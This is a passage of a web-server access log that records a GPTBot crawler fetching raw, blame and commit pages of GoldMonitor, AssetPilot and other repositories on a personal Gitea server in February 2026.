Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:14:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10263] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11489] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20471] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22184] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:14:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18377] [Gzip 9.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:14:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12398] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12358] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10390] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" +[17/Feb/2026:14:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11794] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:14:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" +[17/Feb/2026:14:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" +[17/Feb/2026:14:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11489] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11577] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:14:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10857] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:14:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17345] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:14:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2ffetcher.py.good" [Client 74.7.227.38] [Length 23688] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:14:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/yearly" [Client 74.7.227.38] [Length 8592] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:14:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10076] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15222] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:14:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] 